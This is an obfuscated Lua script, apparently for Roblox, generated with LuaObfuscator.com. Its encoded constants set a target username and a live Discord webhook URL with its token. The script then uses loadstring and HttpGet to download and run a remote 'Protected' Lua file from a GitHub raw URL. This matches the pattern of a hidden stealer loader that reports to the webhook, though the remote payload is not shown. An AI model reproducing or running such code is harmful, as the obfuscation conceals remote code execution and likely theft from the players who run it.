--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=0;local v68;while true do if (0==v67) then v68=v2(v0(v30,16));if v19 then local v98=v5(v68,v19);v19=nil;return v98;else return v68;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v69=0;local v70;while true do if (v69==(0 -0)) then v70=(v31/((5 -3)^(v32-(1 -0))))%((4 -(2 + 0))^(((v33-(620 -(555 + (91 -27)))) -(v32-(932 -(857 + 74)))) + ((1634 -(68 + 997)) -(367 + 201)))) ;return v70-(v70%((2198 -(226 + 1044)) -(214 + 713))) ;end end else local v71=0 + 0 ;local v72;while true do if (v71==(0 + 0)) then v72=(879 -(282 + 595))^(v32-(4 -3)) ;return (((v31%(v72 + v72))>=v72) and (1638 -(1523 + (231 -(32 + 85))))) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(892 + (245 -(67 + 113)))) );v18=v18 + (9 -5) ;return (v40 * (31011612 -14234396)) + (v39 * (120312 -(40166 + 14610))) + (v38 * (606 -(87 + 263))) + v37 ;end local function v24()local v41=0 -(438 -(145 + 293)) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(2 + 0)) then v46=v20(v43,83 -(492 -(44 + 386)) ,31);v47=((v20(v43,32)==(953 -(802 + 150))) and  -(2 -1)) or 1 ;v41=5 -2 ;end if (v41==(0 + 0)) then v42=v23();v43=v23();v41=998 -(915 + 82) ;end if (v41==(8 -(1491 -(998 + 488)))) then if (v46==(0 + 0)) then if (v45==0) then return v47 * (0 -0) ;else v46=1;v44=1187 -(1069 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0 + 0)/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end if (v41==(19 -(10 + 8))) then v44=3 -2 ;v45=(v20(v43,(1215 -(201 + 571)) -(416 + 26) ,63 -43 ) * ((1 + 1)^32)) + v42 ;v41=3 -1 ;end end end local function v25(v48)local v49=1138 -(116 + 1022) ;local v50;local v51;while true do if (v49==(4 -3)) then v50=v3(v16,v18,(v18 + v48) -((3 -2) + 0) );v18=v18 + v48 ;v49=7 -5 ;end if (v49==(7 -5)) then v51={};for v76=860 -(814 + (213 -168)) , #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=7 -4 ;end if (v49==(1 + 2)) then return v6(v51);end if (v49==(0 + 0 + 0)) then v50=nil;if  not v48 then local v94=(3046 -2161) -(261 + 624) ;while true do if (v94==(0 -0)) then v48=v23();if (v48==(1080 -(1020 + 60))) then return "";end break;end end end v49=1424 -(630 + 793) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=2) then else v57=nil;v58=nil;v52=3;end if (1==v52) then v55=nil;v56=nil;v52=2 + 0 ;end if (v52~=0) then else v53=0 + 0 ;v54=nil;v52=1 + 0 ;end if (v52~=3) then else v59=nil;while true do local v78=0;local v79;while true do if (v78==(0 -0)) then v79=0;while true do if (v79==(1 -0)) then if (v53==2) then local v113=0;while true do if (v113~=(0 + 0)) then else for v141=1637 -(1373 + 263) ,v23() do local v142=1000 -(451 + 549) ;local v143;local v144;local v145;while true do if (v142==1) then v145=nil;while true do if (v143~=(1 + 0)) then else while true do if (v144~=0) then else v145=v21();if (v20(v145,1,1 -0 )==(0 -0)) then local v186=1384 -(746 + 638) ;local v187;local v188;local v189;local v190;local v191;while true do if (v186~=2) then else v191=nil;while true do if (v187~=2) then else while true do if (2==v188) then local v194=0;local v195;while true do if (v194~=(0 + 0)) then else v195=0 -0 ;while true do if (v195==(341 -(218 + 123))) then local v204=0;while true do if (v204==1) then v195=1582 -(1535 + 46) ;break;end if (v204==(0 + 0)) then if (v20(v190,1 + 0 ,561 -(306 + 254) )==1) then v191[1 + 1 ]=v59[v191[3 -1 ]];end if (v20(v190,2,2)==(1468 -(899 + 568))) then v191[2 + 1 ]=v59[v191[3]];end v204=1;end end end if (v195==1) then v188=7 -4 ;break;end end break;end end end if (v188==3) then if (v20(v190,606 -(268 + 335) ,293 -(60 + 230) )==1) then v191[4]=v59[v191[576 -(426 + 146) ]];end v54[v141]=v191;break;end if (0~=v188) then else local v197=0 + 0 ;while true do if (v197==(1457 -(282 + 1174))) then v188=812 -(569 + 242) ;break;end if ((0 -0)==v197) then v189=v20(v145,2,1 + 2 );v190=v20(v145,1028 -(706 + 318) ,1257 -(721 + 530) );v197=1272 -(945 + 326) ;end end end if (v188==(2 -1)) then local v198=0 + 0 ;while true do if (v198==1) then v188=2;break;end if (v198~=(700 -(271 + 429))) then else v191={v22(),v22(),nil,nil};if (v189==(1086 -(461 + 625))) then local v201=1288 -(993 + 295) ;local v202;local v203;while true do if (v201~=(0 + 0)) then else v202=1171 -(418 + 753) ;v203=nil;v201=1;end if (v201~=(1 + 0)) then else while true do if (v202==(0 + 0)) then v203=0 + 0 ;while true do if (v203==0) then v191[3]=v22();v191[4]=v22();break;end end break;end end break;end end elseif (v189==(1 + 0)) then v191[3]=v23();elseif (v189==(531 -(406 + 123))) then v191[3]=v23() -((1771 -(1749 + 20))^(4 + 12)) ;elseif (v189==(1325 -(1249 + 73))) then local v211=0;local v212;while true do if (v211~=(0 + 0)) then else v212=1145 -(466 + 679) ;while true do if (v212==(0 -0)) then v191[3]=v23() -(2^16) ;v191[4]=v22();break;end end break;end end end v198=2 -1 ;end end end end break;end if (v187~=(1900 -(106 + 1794))) then else v188=0 + 0 ;v189=nil;v187=1;end if (v187~=(1 + 0)) then else local v193=0;while true do if (v193~=(2 -1)) then else v187=5 -3 ;break;end if (v193==0) then v190=nil;v191=nil;v193=115 -(4 + 110) ;end end end end break;end if (v186~=(585 -(57 + 527))) then else v189=nil;v190=nil;v186=1429 -(41 + 1386) ;end if (v186==(103 -(17 + 86))) then v187=0 + 0 ;v188=nil;v186=1 -0 ;end end end break;end end break;end if (v143==(0 -0)) then local v179=0;while true do if ((166 -(122 + 44))==v179) then local v185=0;while true do if (v185==0) then v144=0 -0 ;v145=nil;v185=3 -2 ;end if (v185==1) then v179=1 + 0 ;break;end end end if (v179~=(1 + 0)) then else v143=1 -0 ;break;end end end end break;end if (v142==0) then local v177=65 -(30 + 35) ;while true do if (v177==(1 + 0)) then v142=1258 -(1043 + 214) ;break;end if (v177==(0 -0)) then v143=1212 -(323 + 889) ;v144=nil;v177=1;end end end end end for v146=2 -1 ,v23() do v55[v146-(581 -(361 + 219)) ]=v28();end v113=321 -(53 + 267) ;end if (v113~=(1 + 0)) then else return v57;end end end break;end if (v79==0) then local v103=413 -(15 + 398) ;while true do if (v103==1) then v79=983 -(18 + 964) ;break;end if (v103~=(0 -0)) then else if (v53==(1 + 0)) then local v139=0;while true do if (v139==0) then v58=v23();v59={};v139=1;end if (v139~=(2 + 0)) then else v53=852 -(20 + 830) ;break;end if (v139~=1) then else local v176=0;while true do if (v176==(1 + 0)) then v139=2;break;end if (v176==(126 -(116 + 10))) then for v180=1,v58 do local v181=0 + 0 ;local v182;local v183;local v184;while true do if (1==v181) then v184=nil;while true do if (v182==(738 -(542 + 196))) then v183=v21();v184=nil;v182=1;end if (v182==(1 -0)) then if (v183==1) then v184=v21()~=(0 + 0) ;elseif (v183==2) then v184=v24();elseif (v183~=3) then else v184=v25();end v59[v180]=v184;break;end end break;end if (v181~=(0 + 0)) then else v182=0 + 0 ;v183=nil;v181=1;end end end v57[7 -4 ]=v21();v176=1;end end end end end if (v53~=0) then else v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=406 -(118 + 287) ;end v103=3 -2 ;end end end end break;end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v80=v64;local v81=v65;local v82=v66;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v95=0,v88 do if (v95>=v82) then v86[v95-v82 ]=v87[v95 + 1 ];else v90[v95]=v87[v95 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=5) then if (v93<=2) then if (v93<=0) then local v104=v92[2];local v105=v90[v92[3]];v90[v104 + 1 ]=v105;v90[v104]=v105[v92[4]];elseif (v93>1) then do return;end else v90[v92[2]]=v92[3];end elseif (v93<=3) then v90[v92[2]]=v62[v92[3]];elseif (v93==4) then v90[v92[2]]=v92[3]~=0 ;else local v117=v92[2];local v118,v119=v83(v90[v117](v13(v90,v117 + 1 ,v92[3])));v85=(v119 + v117) -1 ;local v120=0;for v134=v117,v85 do v120=v120 + 1 ;v90[v134]=v118[v120];end end elseif (v93<=8) then if (v93<=6) then local v111=0;local v112;while true do if (v111==0) then v112=v92[2];v90[v112]=v90[v112](v13(v90,v112 + 1 ,v85));break;end end elseif (v93==7) then local v121=0;local v122;local v123;local v124;local v125;local v126;while true do if (v121==6) then v92=v80[v84];v126=v92[2];v123,v124=v83(v90[v126](v13(v90,v126 + 1 ,v92[3])));v85=(v124 + v126) -1 ;v121=7;end if (v121==3) then v92=v80[v84];v126=v92[2];v125=v90[v92[3]];v90[v126 + 1 ]=v125;v121=4;end if (2==v121) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v62[v92[3]];v84=v84 + 1 ;v121=3;end if (8==v121) then v126=v92[2];v90[v126]=v90[v126](v13(v90,v126 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v121=9;end if (v121==7) then v122=0;for v173=v126,v85 do v122=v122 + 1 ;v90[v173]=v123[v122];end v84=v84 + 1 ;v92=v80[v84];v121=8;end if (4==v121) then v90[v126]=v125[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v121=5;end if (v121==1) then v62[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v62[v92[3]];v121=2;end if (v121==5) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3]~=0 ;v84=v84 + 1 ;v121=6;end if (v121==9) then v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];break;end if (v121==0) then v122=nil;v123,v124=nil;v125=nil;v126=nil;v121=1;end end else v90[v92[2]]();end elseif (v93<=10) then if (v93>9) then v84=v92[3];elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==11) then v62[v92[3]]=v90[v92[2]];else v62[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v62[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v84=v92[3];end v84=v84 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203073O0058444A41493038030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5661706F72656F6E536372697074732F4469616D6F6E642F6D61696E2F50726F7465637465645F3137363733312O3739313437333431362E6C756103083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135313438323937343331363031393833322F7745333872676D386C5F54306657544347537554785F484D6B5A344D412O504D41464E5A466832424A46774975776171386344615F2O4D4E70534432696C6F68625A4C6600173O0012013O00013O0026093O000E0001000200040A3O000E0001001201000100043O001207000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026093O00010001000100040A3O00010001001201000100043O00120C000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00023O00017O00",v9(),...);
